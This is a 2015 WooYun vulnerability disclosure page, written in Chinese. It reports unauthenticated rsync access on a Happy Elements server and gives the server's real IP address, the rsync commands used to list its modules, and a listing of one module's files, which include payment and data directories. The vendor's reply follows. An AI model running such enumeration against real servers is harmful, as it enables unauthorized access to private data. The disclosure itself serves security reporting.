当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112131

漏洞标题:乐元素某rsync未授权访问可能导致大量敏感信息泄漏

相关厂商:happyelements.cn

漏洞作者: 路人甲

提交时间:2015-05-05 11:18

修复时间:2015-06-19 11:38

公开时间:2015-06-19 11:38

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

乐元素某rsync未授权访问可能导致大量敏感信息泄漏

详细说明:

root@jack:~# rsync 218.106.255.53::
rtest
titan
apollo
rome
gip
fishbowl
forest
malldream
fbcard
payment
adventure
fortuna
athena
gaia
dreamcake
rdcenter
eskimo
piratessaga
poseidon
bubble
iceberg
qqfuzhuangdian
warcrisis
--help
odin
picasso
pirate
noah
league
kingdomplay
hotbottlesh
pandora
adam
magicpet
fireempire
test_optimize
test
fighter
kongfusaga
animal
eris
yanhuang
xiyou
hongjing
wukong
yanyi
jianghu
kuaida
canon
hunluanwulin
towerdefence
mobile_bubble
mbubble
manimal
mistresses


root@jack:~# rsync 218.106.255.53::gip
drwxr-xr-x        4096 2013/07/26 12:36:56 .
-rw-r--r--           0 2012/10/31 00:35:32 .autofsck
-rw-r--r--           0 2011/03/11 21:30:50 .autorelabel
srwxr-xr-x           0 2012/06/11 08:33:43 .dbfseventsd
-rw-r--r--         630 2013/05/31 02:52:58 crossdomain.xml
-rwxr-xr-x    15567576 2012/04/09 22:34:04 mach_kernel
-rwxr-xr-x      235320 2011/12/31 03:42:00 n6au6v.jpg
-rw-r--r--           8 2011/09/08 03:52:05 ok.html
-rwxr-xr-x        2718 2011/05/11 23:30:22 pause.xml
-rw-r--r--          19 2011/02/16 12:34:11 sn.txt
lrwxrwxrwx          75 2012/06/12 05:20:18 用户手册和信息
drwxr-xr-x        4096 2012/05/14 19:58:37 .DocumentRevisions-V100
drwxr-xr-x        4096 2011/07/08 05:04:27 .Spotlight-V100
drwxr-xr-x        4096 2011/07/08 05:13:16 .Trashes
drwxr-xr-x        4096 2012/06/12 03:25:22 .fseventsd
drwxr-xr-x        4096 2011/06/25 02:05:31 .vol
drwxr-xr-x        4096 2012/10/08 08:18:15 404
drwxr-xr-x        4096 2012/06/12 07:39:58 Applications
drwxr-xr-x        4096 2012/12/18 22:44:01 app
drwxr-xr-x        4096 2012/08/16 20:04:42 build
drwxr-xr-x        4096 2012/10/08 22:44:49 client
drwxr-xr-x        4096 2012/11/22 22:22:30 clinic
drwxr-xr-x        4096 2012/05/20 22:30:15 common
drwxr-xr-x        4096 2013/05/31 02:52:58 component
drwxr-xr-x        4096 2012/10/08 22:44:49 container
drwxr-xr-x        4096 2011/04/02 11:54:15 css
drwxr-xr-x        4096 2013/10/31 07:35:23 data
drwxrwxr-x        4096 2013/07/26 15:34:41 facebook_channel
drwxr-xr-x       12288 2012/10/17 03:45:57 fm
drwxr-xr-x        4096 2011/08/04 04:02:02 framework
drwxr-xr-x        4096 2011/04/02 11:53:54 gadgetXML
drwxr-xr-x        4096 2014/05/06 22:33:58 gip_image_upload
drwxr-xr-x        4096 2011/09/25 23:54:39 html
drwxr-xr-x        4096 2011/11/18 00:21:00 html5
drwxr-xr-x        4096 2013/01/03 23:16:55 images
drwxr-xr-x        4096 2011/04/02 11:53:54 integration
drwxr-xr-x        4096 2011/04/02 11:53:54 js
drwxr-xr-x        4096 2011/12/15 02:54:40 mall
drwxr-xr-x        4096 2012/04/11 04:43:25 monitor
drwxr-xr-x        4096 2012/05/15 05:03:10 ops_test_dir
drwxr-xr-x        4096 2014/01/17 06:06:03 partition
drwxr-xr-x        4096 2011/04/02 11:46:58 partner
drwxr-xr-x        4096 2011/07/19 02:48:35 payment
drwxr-xr-x        4096 2013/05/31 02:52:58 platform
drwxr-xr-x        4096 2011/12/21 22:58:05 portal
drwxr-xr-x        4096 2011/04/02 11:54:42 portal_images
drwxr-xr-x        4096 2011/04/02 11:54:02 preloader
drwxr-xr-x       12288 2011/04/02 11:54:33 promotion
drwxr-xr-x        4096 2013/07/26 12:36:56 qzone_static
drwxr-xr-x        4096 2013/07/25 15:22:39 static
drwxr-xr-x        4096 2012/01/13 02:52:28 swf
drwxr-xr-x        4096 2011/04/07 01:30:48 tencent
drwxr-xr-x        4096 2011/06/14 02:59:21 test
drwxr-xr-x        4096 2011/06/07 03:09:46 translation
drwxr-xr-x        4096 2011/04/02 11:54:43 util
drwxrwxrwx        4096 2013/01/09 04:09:47 xfiles
drwxr-xr-x        4096 2012/05/10 23:20:20 xfiles_prod
drwxr-xr-x        4096 2012/11/13 01:28:06 zoom

漏洞证明:

乐乐.png

修复方案:

。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-05 11:37

厂商回复:

不是很重要的服务器,但还是很感谢发现者

最新状态:

暂无